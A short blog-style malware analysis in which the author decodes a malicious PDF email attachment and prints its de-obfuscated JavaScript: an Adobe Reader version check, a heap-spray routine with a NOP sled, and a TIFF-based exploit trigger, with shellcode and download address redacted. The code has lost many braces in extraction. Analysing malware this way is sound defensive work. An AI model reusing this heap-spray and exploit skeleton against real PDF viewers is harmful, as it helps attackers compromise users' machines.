Decoding a PDF Virus E-Mail

Today I received a malicious email via gmail.

Title: “Check this. It might be useful for u.”
From: via 11:55 AM (2 hours ago) to Nick

With some garbled HTML data in the text area and a MIME PDF attachment “621624.pdf”

The email came from a someone who must have had me on their address book as I communicated with them previously years ago.

Of course I had to investigate and uploaded the pdf to for further analysis.

The PDF contained a hidden javascript package which was further obfuscated.

After manually de-obfuscating the code I came up with:

var encoded = "a3tf31jre0........." (redacted)
var decode1 = encoded.replace(/a3tf31jre/g,"%");
var decoded = unescape(decode1);

The encoded string breaks out to:

var j_IgC = [31, 31, 15, 23];

function _k_m()
return app;

function _b_(xVgFqV)
var ___N = "";
___N = unescape(xVgFqV);
return ___N;

function get_ver()
var ver = _k_m().viewerVersion.toString();
ver = ver.replace(".", "");
while (ver.length < 4)
ver += "0";
ver = parseInt(ver, 10);
return ver;

function make_block(xVgFqV, len)
while (xVgFqV.length * 2 < len)
xVgFqV += xVgFqV;
xVgFqV = xVgFqV.substring(0, len/ 2);
return xVgFqV;

function heap_spray3(scode)
scode = _b_(scode);
var sclen = scode.length * 2;
var fasdds = _b_("%u9090");
var spray = make_block(fasdds,0x2000 - sclen);
var block = scode + spray;
block = make_block(block,0x80000 - 0x40);
for (var i = 0;i<0x190;i ++)
j_IgC[i] = block.substr(0,block.length - 1) + fasdds;

function make_str(xVgFqV,len)
while (xVgFqV.length < len){ xVgFqV += xVgFqV; }
xVgFqV = xVgFqV.substring(0, len);
return xVgFqV;

function num2hex(num)
var xVgFqV = num.toString(16);
var len = xVgFqV.length;
var ret = (len % 2) ? "0" + xVgFqV : xVgFqV;
return ret;

function str2uni(xVgFqV)
var ret = "";
for (var i = 0;i < xVgFqV.length;i += 2)
ret += "%u";
ret += num2hex(xVgFqV.charCodeAt(i + 1));
ret += num2hex(xVgFqV.charCodeAt(i));
return ret;

function hex2str(hex)
var ret = "";
for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; } exploit(); function exploit() { var ver = get_ver(); if (ver >= 8000)
var tiff = "SUkqADggAABB";
var nops = make_str("QUFB",0x2ae8);
var start "..."; (redacted)
var foot = "";
var sc_hex = "";

if (ver < 8201)
foot = "..."; (redacted)
var sc_hex = "..."; (redacted)
foot = "..."; (redacted)
sc_hex = "..."; (redacted)

if (foot.length)
var ret = [tiff,nops,start,foot].join("");
var sc_str = hex2str(sc_hex);
var scode = str2uni(sc_str);
pwzh6lr.rawValue = ret;

After the PDF viewer is “heap sprayed” ( ) the exploit payload that is injected goes out to download (redacted). I have not analyzed the executable it self but would imagine that it is some sort of a trojan.